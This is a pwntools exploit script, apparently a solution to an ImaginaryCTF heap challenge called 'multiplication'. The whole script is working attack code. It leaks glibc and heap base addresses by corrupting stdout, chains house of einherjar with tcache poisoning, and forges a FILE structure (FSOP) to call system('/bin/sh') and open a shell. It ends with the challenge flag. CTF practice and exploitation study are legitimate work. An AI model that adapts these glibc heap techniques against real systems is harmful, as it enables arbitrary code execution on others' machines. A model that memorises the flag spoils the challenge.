from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = gdb.debug('./vuln_patched', '''
    # brva 0x146e
    continue
''')

# p = remote('multiplication.chal.imaginaryctf.org', 1337)

# malloc a chunk with a size and fill it with specified size of data at most by fgets (accessible to control one and only latest malloced chunk) (mmap is able to be triggered if size is greater than 0x20000)
def create_string(size, content):
    p.sendlineafter(b"> ", b'1')
    p.sendlineafter(b": ", str(size).encode())
    p.sendlineafter(b": ", content)

# free current controlled chunk and then set ptr to NULL and size to 0 (ptr and size are global variables) (no normal use-after-free vulnerability)
def delete_string():
    p.sendlineafter(b"> ", b'2')

# multiply a byte of current controlled chunk at ptr+index (integer overflow vulnerability since index can be positive or negative) (able to multiply any byte at any place with a NULL ptr and a arbitrary index)
def multiply(index):
    p.sendlineafter(b"> ", b'3')
    p.sendlineafter(b": ", str(index).encode())

glibc_e = ELF('./libc.so.6')

# Stage 1: leak glibc base address and heap base address
# malloc a chunk with a size greater than 0x20000 bytes to make it go to memory-mapped region (page aligned automatically), which has a fixed offset from glibc base address
create_string(0x30000, b'X'*8)
# multiply to change _flags and _IO_write_base in glibc's _IO_2_1_stdout_ to use it as read primitive to leak a bunch of data with a customized range
multiply(0x2385b0+1)
multiply(0x2385b0+1)
multiply(0x2385b0+1)
multiply(0x2385b0+1)
multiply(0x2385d0+1)
# a large amount of bytes from *_IO_write_base to *_IO_write_ptr are leaked out, containing a lot of useful information
leaks = p.recvuntil(b"String updated.\n", drop=True)[0:-3]
glibc_base_addr = u64(leaks[-0x40:-0x38])-0x204644
log.info(f"glibc base address: {hex(glibc_base_addr)}")
heap_base_addr = u64(leaks[-0xb20:-0xb18])-0x290
log.info(f"heap base address: {hex(heap_base_addr)}")

# Stage 2: house of einherjar
# prepare fake chunk of size 0x400 at heap_base_addr+0x2b0 for house of einherjar in chunk at heap_base_addr+0x2a0
create_string(0xf8, p64(0)+p64(0x400)+p64(heap_base_addr+0x2a0)*2+p64(heap_base_addr+0x2a0)*2)
# prepare chunk of size 0x110 at heap_base_addr+0x3a0 for tcache poisoning to trigger FSOP later
create_string(0x108, b'X'*8)
# free it to make tcache_count of 0x110 size tcache bin equals to 1
delete_string()
# pad chunk for fake chunk
create_string(0x78, b'X'*8)
# free it to make tcache_count of 0x80 size tcache bin equals to 1
delete_string()
# pad chunk for fake chunk, overwrite prev_size of target chunk at heap_base_addr+0x6b0 with fake chunk size 0x400 to pass check of house of einherjar
create_string(0x178, b'X'*0x170+p64(0x400)[:-1])
# free it to make tcache_count of 0x180 size tcache bin equals to 1
delete_string()
# prepare target chunk at heap_base_addr+0x6b0 for house of einherjar
create_string(0xf8, b'X'*8)
# free it to make tcache_count of 0x100 size tcache bin equals to 1
delete_string()
# multiply 3 times to change tcache_count of 0x100 size tcache bin from 1 to 8
multiply(heap_base_addr+0x28+4)
multiply(heap_base_addr+0x28+4)
multiply(heap_base_addr+0x28+4)
# prepare target chunk at heap_base_addr+0x6b0 for house of einherjar, now tcache_count of 0x100 size tcache bin equals to 7, tricking program into thinking 0x100 size tcache bin is full
create_string(0xf8, b'X'*8)
# multiply 8 times to change size of target chunk at heap_base_addr+0x6b0 from 0x101 to 0x100 to pass check of house of einherjar
for _ in range(8):
    multiply(-8)
# free target chunk at heap_base_addr+0x6b0 to trigger house of einherjar, a chunk of size 0x500 (0x400+0x100) starting from fake chunk at heap_base_addr+0x2b0 is freed into unsorted bin and immediately consolidated to wilderness
delete_string()

# Stage 3: tcache poisoning to trigger FSOP
# malloc chunk of size 0x500 starting from heap_base_addr+0x2b0 generated by house of einherjar, overwrite fd of chunk at heap_base_addr+0x3a0 to make 0x110 size tcache bin looks like heap_base_addr+0x3a0 -> _IO_2_1_stdout_, but tcache_count of 0x110 size tcache bin is currently still 1
create_string(0x4f8, b'\x00'*0xe8+p64(0x111)+p64(((heap_base_addr+0x3a0)>>12)^(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_'])))
# free it since no further usage of this chunk
delete_string()
# multiply 1 time to change tcache_count of 0x110 size tcache bin from 1 to 2, now heap_base_addr+0x3a0 -> _IO_2_1_stdout_ in 0x110 size tcache bin is available for tcache poisoning
multiply(heap_base_addr+0x28+6)
# perform tcache poisoning to trigger FSOP
create_string(0x108, b'A'*8)
fake = FileStructure(0)
fake.flags = 0x3b01010101010101
fake._IO_read_end = glibc_base_addr+glibc_e.sym.system
fake._IO_write_end = u64(b'/bin/sh\x00')
fake._IO_save_base = glibc_base_addr+next(glibc_e.search(asm('add rdi, 0x10; jmp rcx;')))
fake._lock = glibc_base_addr+glibc_e.symbols['_IO_stdfile_1_lock']
fake._codecvt = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0xb8
fake._wide_data = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x200
fake.unknown2 = p64(0)*2+p64(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x20)+p64(0)*3+p64(glibc_base_addr+glibc_e.symbols['_IO_wfile_jumps']-0x18)
create_string(0x108, bytes(fake))

p.interactive()

# https://4xura.com/binex/pwn-mp_-exploiting-malloc_par-to-gain-tcache-bin-control/
# ictf{p0w3r_0f_d0ubl1ng_fr_73e65974ce1f}